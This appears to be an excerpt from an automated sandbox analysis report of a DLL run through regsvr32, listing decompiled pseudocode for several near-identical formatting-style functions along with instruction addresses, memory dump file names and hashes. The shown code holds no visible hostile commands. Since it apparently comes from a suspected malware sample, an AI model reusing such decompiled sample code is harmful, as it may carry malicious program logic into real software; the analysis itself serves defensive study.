                                                                                                              0x18001c3fc
                                                                                                              0x18001c403
                                                                                                              0x18001c409
                                                                                                              0x18001c40e
                                                                                                              0x18001c417
                                                                                                              0x18001c420
                                                                                                              0x18001c426
                                                                                                              0x18001c42b
                                                                                                              0x18001c42f
                                                                                                              0x18001c432
                                                                                                              0x18001c439
                                                                                                              0x18001c43d
                                                                                                              0x18001c448
                                                                                                              0x18001c44d
                                                                                                              0x18001c453
                                                                                                              0x18001c45a
                                                                                                              0x18001c467
                                                                                                              0x18001c477
                                                                                                              0x18001c479
                                                                                                              0x18001c47d
                                                                                                              0x18001c485
                                                                                                              0x18001c495
                                                                                                              0x18001c49c
                                                                                                              0x18001c4a4
                                                                                                              0x18001c4a6
                                                                                                              0x18001c4aa
                                                                                                              0x18001c4ae
                                                                                                              0x18001c4b8
                                                                                                              0x18001c4bd
                                                                                                              0x18001c4c2
                                                                                                              0x18001c4c6
                                                                                                              0x18001c4d3
                                                                                                              0x18001c4de
                                                                                                              0x18001c4e7
                                                                                                              0x18001c4e9
                                                                                                              0x18001c4f2
                                                                                                              0x18001c4f5
                                                                                                              0x18001c50e

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7520fa444885010e49863c5e2901d86da3ace90371f76d8304f024fc0cc30993
                                                                                                              • Instruction ID: 64a1831909bc35b146a3df22fb1fc606f8b45e1c22c4927ab76a2f2403be3dc7
                                                                                                              • Opcode Fuzzy Hash: 7520fa444885010e49863c5e2901d86da3ace90371f76d8304f024fc0cc30993
                                                                                                              • Instruction Fuzzy Hash: 5A51B173604A5883E7AA8F28C0547BC37A0E359BA8F15C219EF56177D8CF21DE45C785
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001F334 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001F334(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t142;
				intOrPtr _t148;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x8001f41b;
				if (_t110 == 0) goto 0x8001f384;
				_t111 = _t86;
				if (_t111 == 0) goto 0x8001f46f;
				if (_t111 == 0) goto 0x8001f3f3;
				if (_t111 == 0) goto 0x8001f3cc;
				if (_t111 == 0) goto 0x8001f46f;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001f43b;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t142;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001f3b6;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001f3b6;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f49a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001f4b1;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f3ed;
				goto 0x8001f39f;
				goto 0x8001f39f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x8001f415;
				goto 0x8001f39f;
				goto 0x8001f39f;
				if (_t118 == 0) goto 0x8001f384;
				if (_t118 == 0) goto 0x8001f384;
				if (_t118 == 0) goto 0x8001f384;
				goto 0x8001f372;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001f50a;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t131 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001f492;
				_t148 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001f39f;
				goto 0x8001f39f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001f4ba;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 1;
				r8b = bpl;
				if (_t142 != 8) goto 0x8001f4d4;
				E000000011800223D0(0, _t133, _t148);
				goto 0x8001f4db;
				E00000001180020E10( *((intOrPtr*)(_t131 - 8)), _t133);
				if (0 == 0) goto 0x8001f508;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001f4f9;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001f508;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001f334
                                                                                                              0x18001f339
                                                                                                              0x18001f33e
                                                                                                              0x18001f348
                                                                                                              0x18001f34b
                                                                                                              0x18001f34e
                                                                                                              0x18001f351
                                                                                                              0x18001f354
                                                                                                              0x18001f35a
                                                                                                              0x18001f35c
                                                                                                              0x18001f35e
                                                                                                              0x18001f367
                                                                                                              0x18001f370
                                                                                                              0x18001f375
                                                                                                              0x18001f37e
                                                                                                              0x18001f384
                                                                                                              0x18001f38c
                                                                                                              0x18001f3a6
                                                                                                              0x18001f3ab
                                                                                                              0x18001f3b3
                                                                                                              0x18001f3ba
                                                                                                              0x18001f3c0
                                                                                                              0x18001f3c7
                                                                                                              0x18001f3d4
                                                                                                              0x18001f3e4
                                                                                                              0x18001f3eb
                                                                                                              0x18001f3f1
                                                                                                              0x18001f3fb
                                                                                                              0x18001f405
                                                                                                              0x18001f40c
                                                                                                              0x18001f413
                                                                                                              0x18001f419
                                                                                                              0x18001f41e
                                                                                                              0x18001f427
                                                                                                              0x18001f430
                                                                                                              0x18001f436
                                                                                                              0x18001f43b
                                                                                                              0x18001f43f
                                                                                                              0x18001f442
                                                                                                              0x18001f449
                                                                                                              0x18001f44d
                                                                                                              0x18001f458
                                                                                                              0x18001f45d
                                                                                                              0x18001f463
                                                                                                              0x18001f46a
                                                                                                              0x18001f477
                                                                                                              0x18001f483
                                                                                                              0x18001f487
                                                                                                              0x18001f489
                                                                                                              0x18001f48d
                                                                                                              0x18001f495
                                                                                                              0x18001f4a5
                                                                                                              0x18001f4ac
                                                                                                              0x18001f4b4
                                                                                                              0x18001f4b6
                                                                                                              0x18001f4ba
                                                                                                              0x18001f4be
                                                                                                              0x18001f4c8
                                                                                                              0x18001f4cd
                                                                                                              0x18001f4d2
                                                                                                              0x18001f4d6
                                                                                                              0x18001f4e3
                                                                                                              0x18001f4ee
                                                                                                              0x18001f4f7
                                                                                                              0x18001f4f9
                                                                                                              0x18001f502
                                                                                                              0x18001f505
                                                                                                              0x18001f51e

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80ab7e812c43dcc5dcfa23f8554693d02f5d7dfe15975562af0530b32900f834
                                                                                                              • Instruction ID: 6c21182014f25466116b8d7c468665fbb8ead4684ae794e0a00471ffdfcda0e6
                                                                                                              • Opcode Fuzzy Hash: 80ab7e812c43dcc5dcfa23f8554693d02f5d7dfe15975562af0530b32900f834
                                                                                                              • Instruction Fuzzy Hash: DF51BF73600E5883E7BA8F28C0543BD27A1E359BA8F148219EF55177D9CF24DE86C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001C510 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001C510(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t85;
				signed int _t89;
				void* _t109;
				intOrPtr _t110;
				signed int _t117;
				intOrPtr _t128;
				void* _t132;
				void* _t141;
				intOrPtr _t147;
				void* _t155;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t132 = __rcx;
				bpl = __edx;
				_t85 =  *((intOrPtr*)(__rcx + 0x34));
				_t109 = _t85 - 5;
				if (_t109 > 0) goto 0x8001c5f7;
				if (_t109 == 0) goto 0x8001c560;
				_t110 = _t85;
				if (_t110 == 0) goto 0x8001c64b;
				if (_t110 == 0) goto 0x8001c5cf;
				if (_t110 == 0) goto 0x8001c5a8;
				if (_t110 == 0) goto 0x8001c64b;
				if (_t85 - 0xffffffffffffffff != 1) goto 0x8001c617;
				_t89 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t141;
				if ((_t89 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c592;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c592;
				 *(__rcx + 0x28) = _t89 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c676;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001c68d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c5c9;
				goto 0x8001c57b;
				goto 0x8001c57b;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t117 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t117 == 0) goto 0x8001c5f1;
				goto 0x8001c57b;
				goto 0x8001c57b;
				if (_t117 == 0) goto 0x8001c560;
				if (_t117 == 0) goto 0x8001c560;
				if (_t117 == 0) goto 0x8001c560;
				goto 0x8001c54e;
				_t128 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t128 + 0x30)) = 1;
				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001c6e6;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (0 == 0) goto 0x8001c66e;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001c57b;
				goto 0x8001c57b;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t147,  *((intOrPtr*)(__rcx + 8)));
				if (_t147 != 0) goto 0x8001c696;
				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
				 *((char*)(_t132 + 0x4c)) = 1;
				r8b = bpl;
				if (_t141 != 8) goto 0x8001c6b0;
				E00000001180021520(0, _t132, _t147, _t155);
				goto 0x8001c6b7;
				0x8001ffa8();
				if (0 == 0) goto 0x8001c6e4;
				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c6d5;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c6e4;
				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
				return 1;
			}















                                                                                                              0x18001c510
                                                                                                              0x18001c515
                                                                                                              0x18001c51a
                                                                                                              0x18001c524
                                                                                                              0x18001c527
                                                                                                              0x18001c52a
                                                                                                              0x18001c52d
                                                                                                              0x18001c530
                                                                                                              0x18001c536
                                                                                                              0x18001c538
                                                                                                              0x18001c53a
                                                                                                              0x18001c543
                                                                                                              0x18001c54c
                                                                                                              0x18001c551
                                                                                                              0x18001c55a
                                                                                                              0x18001c560
                                                                                                              0x18001c568
                                                                                                              0x18001c582
                                                                                                              0x18001c587
                                                                                                              0x18001c58f
                                                                                                              0x18001c596
                                                                                                              0x18001c59c
                                                                                                              0x18001c5a3
                                                                                                              0x18001c5b0
                                                                                                              0x18001c5c0
                                                                                                              0x18001c5c7
                                                                                                              0x18001c5cd
                                                                                                              0x18001c5d7
                                                                                                              0x18001c5e1
                                                                                                              0x18001c5e8
                                                                                                              0x18001c5ef
                                                                                                              0x18001c5f5
                                                                                                              0x18001c5fa
                                                                                                              0x18001c603
                                                                                                              0x18001c60c
                                                                                                              0x18001c612
                                                                                                              0x18001c617
                                                                                                              0x18001c61b
                                                                                                              0x18001c61e
                                                                                                              0x18001c625
                                                                                                              0x18001c629
                                                                                                              0x18001c634
                                                                                                              0x18001c639
                                                                                                              0x18001c63f
                                                                                                              0x18001c646
                                                                                                              0x18001c653
                                                                                                              0x18001c663
                                                                                                              0x18001c665
                                                                                                              0x18001c669
                                                                                                              0x18001c671
                                                                                                              0x18001c681
                                                                                                              0x18001c688
                                                                                                              0x18001c690
                                                                                                              0x18001c692
                                                                                                              0x18001c696
                                                                                                              0x18001c69a
                                                                                                              0x18001c6a4
                                                                                                              0x18001c6a9
                                                                                                              0x18001c6ae
                                                                                                              0x18001c6b2
                                                                                                              0x18001c6bf
                                                                                                              0x18001c6ca
                                                                                                              0x18001c6d3
                                                                                                              0x18001c6d5
                                                                                                              0x18001c6de
                                                                                                              0x18001c6e1
                                                                                                              0x18001c6fa

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b849139e90f68dcc7ed434c34ee5f177170d2f82e41448c988f69b5bfc1bc5b8
                                                                                                              • Instruction ID: 1a40741a12123bf8a366923e67f4d1535cee181772a8ef9a42a75ed13f9f358c
                                                                                                              • Opcode Fuzzy Hash: b849139e90f68dcc7ed434c34ee5f177170d2f82e41448c988f69b5bfc1bc5b8
                                                                                                              • Instruction Fuzzy Hash: 9751E277600E1882E7AA8F28C1547AC37A1E359BE8F148219EF06177D8CF30DE85C789
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001F520 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001F520(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t142;
				intOrPtr _t148;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x8001f607;
				if (_t110 == 0) goto 0x8001f570;
				_t111 = _t86;
				if (_t111 == 0) goto 0x8001f65b;
				if (_t111 == 0) goto 0x8001f5df;
				if (_t111 == 0) goto 0x8001f5b8;
				if (_t111 == 0) goto 0x8001f65b;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001f627;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t142;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001f5a2;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001f5a2;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f686;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001f69d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001f5d9;
				goto 0x8001f58b;
				goto 0x8001f58b;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x8001f601;
				goto 0x8001f58b;
				goto 0x8001f58b;
				if (_t118 == 0) goto 0x8001f570;
				if (_t118 == 0) goto 0x8001f570;
				if (_t118 == 0) goto 0x8001f570;
				goto 0x8001f55e;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001f6f6;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t131 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001f67e;
				_t148 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001f58b;
				goto 0x8001f58b;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001f6a6;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 1;
				r8b = bpl;
				if (_t142 != 8) goto 0x8001f6c0;
				E00000001180022474(0, _t133, _t148);
				goto 0x8001f6c7;
				E00000001180020EB4( *((intOrPtr*)(_t131 - 8)), _t133);
				if (0 == 0) goto 0x8001f6f4;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001f6e5;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001f6f4;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001f520
                                                                                                              0x18001f525
                                                                                                              0x18001f52a
                                                                                                              0x18001f534
                                                                                                              0x18001f537
                                                                                                              0x18001f53a
                                                                                                              0x18001f53d
                                                                                                              0x18001f540
                                                                                                              0x18001f546
                                                                                                              0x18001f548
                                                                                                              0x18001f54a
                                                                                                              0x18001f553
                                                                                                              0x18001f55c
                                                                                                              0x18001f561
                                                                                                              0x18001f56a
                                                                                                              0x18001f570
                                                                                                              0x18001f578
                                                                                                              0x18001f592
                                                                                                              0x18001f597
                                                                                                              0x18001f59f
                                                                                                              0x18001f5a6
                                                                                                              0x18001f5ac
                                                                                                              0x18001f5b3
                                                                                                              0x18001f5c0
                                                                                                              0x18001f5d0
                                                                                                              0x18001f5d7
                                                                                                              0x18001f5dd
                                                                                                              0x18001f5e7
                                                                                                              0x18001f5f1
                                                                                                              0x18001f5f8
                                                                                                              0x18001f5ff
                                                                                                              0x18001f605
                                                                                                              0x18001f60a
                                                                                                              0x18001f613
                                                                                                              0x18001f61c
                                                                                                              0x18001f622
                                                                                                              0x18001f627
                                                                                                              0x18001f62b
                                                                                                              0x18001f62e
                                                                                                              0x18001f635
                                                                                                              0x18001f639
                                                                                                              0x18001f644
                                                                                                              0x18001f649
                                                                                                              0x18001f64f
                                                                                                              0x18001f656
                                                                                                              0x18001f663
                                                                                                              0x18001f66f
                                                                                                              0x18001f673
                                                                                                              0x18001f675
                                                                                                              0x18001f679
                                                                                                              0x18001f681
                                                                                                              0x18001f691
                                                                                                              0x18001f698
                                                                                                              0x18001f6a0
                                                                                                              0x18001f6a2
                                                                                                              0x18001f6a6
                                                                                                              0x18001f6aa
                                                                                                              0x18001f6b4
                                                                                                              0x18001f6b9
                                                                                                              0x18001f6be
                                                                                                              0x18001f6c2
                                                                                                              0x18001f6cf
                                                                                                              0x18001f6da
                                                                                                              0x18001f6e3
                                                                                                              0x18001f6e5
                                                                                                              0x18001f6ee
                                                                                                              0x18001f6f1
                                                                                                              0x18001f70a

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 043b2fd71d1d33525240d55cab4ceddd918ac8add6b994a18b14806599dcccce
                                                                                                              • Instruction ID: 1ba7bc8e52bddd33a99167fc6073ce11e5009d83e8b32080b87c2086df3c56d4
                                                                                                              • Opcode Fuzzy Hash: 043b2fd71d1d33525240d55cab4ceddd918ac8add6b994a18b14806599dcccce
                                                                                                              • Instruction Fuzzy Hash: 44519077600E5882E7BA8F29C1543BC27A1E358BE8F158215EF4A177E9CF21CE49C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001C92C Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001C92C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t142;
				intOrPtr _t148;
				void* _t156;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x8001ca13;
				if (_t110 == 0) goto 0x8001c97c;
				_t111 = _t86;
				if (_t111 == 0) goto 0x8001ca67;
				if (_t111 == 0) goto 0x8001c9eb;
				if (_t111 == 0) goto 0x8001c9c4;
				if (_t111 == 0) goto 0x8001ca67;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001ca33;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t142;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001c9ae;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001c9ae;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ca92;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001caa9;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c9e5;
				goto 0x8001c997;
				goto 0x8001c997;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x8001ca0d;
				goto 0x8001c997;
				goto 0x8001c997;
				if (_t118 == 0) goto 0x8001c97c;
				if (_t118 == 0) goto 0x8001c97c;
				if (_t118 == 0) goto 0x8001c97c;
				goto 0x8001c96a;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001cb02;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t131 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001ca8a;
				_t148 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001c997;
				goto 0x8001c997;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001cab2;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 1;
				r8b = bpl;
				if (_t142 != 8) goto 0x8001cacc;
				E00000001180021630(0, _t133, _t148, _t156);
				goto 0x8001cad3;
				E000000011800200B8( *((intOrPtr*)(_t131 - 8)), _t133, _t156);
				if (0 == 0) goto 0x8001cb00;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001caf1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001cb00;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}















                                                                                                              0x18001c92c
                                                                                                              0x18001c931
                                                                                                              0x18001c936
